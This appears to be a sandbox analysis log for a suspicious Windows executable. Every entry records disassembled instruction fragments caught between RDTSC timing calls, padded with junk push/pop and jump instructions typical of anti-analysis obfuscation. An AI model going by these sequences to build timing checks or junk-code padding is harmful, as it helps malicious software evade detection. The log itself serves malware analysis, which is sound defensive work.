Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D495B9 second address: D495E2 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0D5D34597Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jl 00007F0D5D345976h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push ebx 0x00000013 jbe 00007F0D5D345978h 0x00000019 jnp 00007F0D5D345982h 0x0000001f jg 00007F0D5D345976h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D4971E second address: D49741 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D4BD028h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D49741 second address: D4976B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0D5D34597Fh 0x0000000c jmp 00007F0D5D345984h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D49BCD second address: D49BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D49BD1 second address: D49BD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D4E5FE second address: D4E633 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0D5D4BD023h 0x0000000c jmp 00007F0D5D4BD026h 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D4E633 second address: D4E638 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D4E638 second address: D4E65B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F0D5D4BD01Eh 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0D5D4BD01Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D4E65B second address: D4E662 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D4E7BD second address: D4E7C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D4E7C3 second address: D4E7C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D4E8F9 second address: D4E90F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D4BD022h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D4E90F second address: D4E93E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D345983h 0x00000007 jns 00007F0D5D34597Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f ja 00007F0D5D345990h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D4ED60 second address: D4ED72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D5D4BD01Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D4ED72 second address: D4ED92 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0D5D345976h 0x00000008 jmp 00007F0D5D345981h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CF4B7C second address: CF4BDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D4BD020h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ebx, dword ptr [ebp+12488C68h] 0x00000013 sub dword ptr [ebp+122D3573h], eax 0x00000019 add eax, ebx 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e call 00007F0D5D4BD018h 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], esi 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc esi 0x00000031 push esi 0x00000032 ret 0x00000033 pop esi 0x00000034 ret 0x00000035 mov dword ptr [ebp+122D34C6h], esi 0x0000003b nop 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F0D5D4BD01Ch 0x00000043 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D584B7 second address: D584C1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0D5D345976h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D584C1 second address: D584C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D56E36 second address: D56E3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D56E3C second address: D56E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0D5D4BD028h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f je 00007F0D5D4BD01Ch 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b pop edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D5714F second address: D57169 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F0D5D345984h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D5793E second address: D5795F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D4BD01Ah 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F0D5D4BD01Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D5795F second address: D5797C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0D5D345984h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D5C41B second address: D5C43C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0D5D4BD016h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F0D5D4BD021h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D5C43C second address: D5C440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D5B7AC second address: D5B7B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D5B7B0 second address: D5B7B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D5B7B6 second address: D5B7BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D5B935 second address: D5B939 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D5BAE4 second address: D5BAE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D5BAE8 second address: D5BAF4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jc 00007F0D5D345976h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D5BAF4 second address: D5BAFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D5BAFA second address: D5BB00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D5BF37 second address: D5BF3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D5BF3B second address: D5BF58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D345989h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D61071 second address: D61077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D61077 second address: D61084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F0D5D345976h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D691CF second address: D691D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D691D8 second address: D691F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jns 00007F0D5D345976h 0x0000000c popad 0x0000000d pushad 0x0000000e jnl 00007F0D5D345976h 0x00000014 pushad 0x00000015 popad 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D691F5 second address: D691F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D6737C second address: D67390 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jne 00007F0D5D345976h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jno 00007F0D5D345976h 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D67390 second address: D67398 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D67398 second address: D6739C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D6739C second address: D673AE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 ja 00007F0D5D4BD016h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D673AE second address: D673B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D6781A second address: D6781E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D679AE second address: D679C0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jbe 00007F0D5D345976h 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D679C0 second address: D679C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D67AFF second address: D67B26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D34597Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0D5D345980h 0x00000010 jnp 00007F0D5D345976h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D67E19 second address: D67E1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D67E1D second address: D67E3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0D5D34597Dh 0x0000000c push esi 0x0000000d push edx 0x0000000e pop edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop esi 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D67E3A second address: D67E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D680F9 second address: D6810E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F0D5D345976h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jnl 00007F0D5D345976h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D6810E second address: D68112 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D7084E second address: D70852 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D70400 second address: D7041C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F0D5D4BD026h 0x0000000c jmp 00007F0D5D4BD020h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D7041C second address: D70453 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 je 00007F0D5D345976h 0x0000000b pop edi 0x0000000c jc 00007F0D5D34597Ch 0x00000012 je 00007F0D5D345976h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pushad 0x0000001b pushad 0x0000001c push edx 0x0000001d pop edx 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F0D5D345984h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D70453 second address: D70473 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0D5D4BD022h 0x0000000d jnl 00007F0D5D4BD016h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CAB897 second address: CAB89F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CAB864 second address: CAB897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F0D5D4BD023h 0x0000000a jmp 00007F0D5D4BD023h 0x0000000f popad 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D7D513 second address: D7D517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D7D517 second address: D7D523 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F0D5D4BD016h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D7D1D0 second address: D7D1D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CBAA8E second address: CBAAB9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 jo 00007F0D5D4BD04Eh 0x0000000f jno 00007F0D5D4BD01Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F0D5D4BD01Ch 0x0000001c rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D82FCC second address: D82FD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D8C887 second address: D8C88C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D975E2 second address: D97616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0D5D345976h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jmp 00007F0D5D345982h 0x00000011 popad 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jc 00007F0D5D345976h 0x0000001c push ebx 0x0000001d pop ebx 0x0000001e pushad 0x0000001f popad 0x00000020 jne 00007F0D5D345976h 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D97616 second address: D97630 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D4BD025h 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D9D777 second address: D9D781 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D9D781 second address: D9D785 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D9D785 second address: D9D793 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D9D793 second address: D9D797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D9D797 second address: D9D7B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D345986h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D9D7B1 second address: D9D7C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F0D5D4BD01Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D9D7C5 second address: D9D7CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D9D983 second address: D9D989 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D9D989 second address: D9D9A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0D5D345987h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D9D9A5 second address: D9D9B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 jnp 00007F0D5D4BD016h 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D9D9B9 second address: D9D9BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D9DC67 second address: D9DC6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D9DF11 second address: D9DF1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D9DF1D second address: D9DF21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D9DF21 second address: D9DF39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0D5D345982h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D9E0B1 second address: D9E0B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D9E0B9 second address: D9E0E6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0D5D34597Eh 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F0D5D345981h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D9EB23 second address: D9EB47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D4BD01Ch 0x00000007 jg 00007F0D5D4BD016h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnp 00007F0D5D4BD018h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D9EB47 second address: D9EB4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D9EB4B second address: D9EB68 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F0D5D4BD01Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F0D5D4BD016h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D9EB68 second address: D9EB6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D9EB6C second address: D9EB70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: DA2735 second address: DA273B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
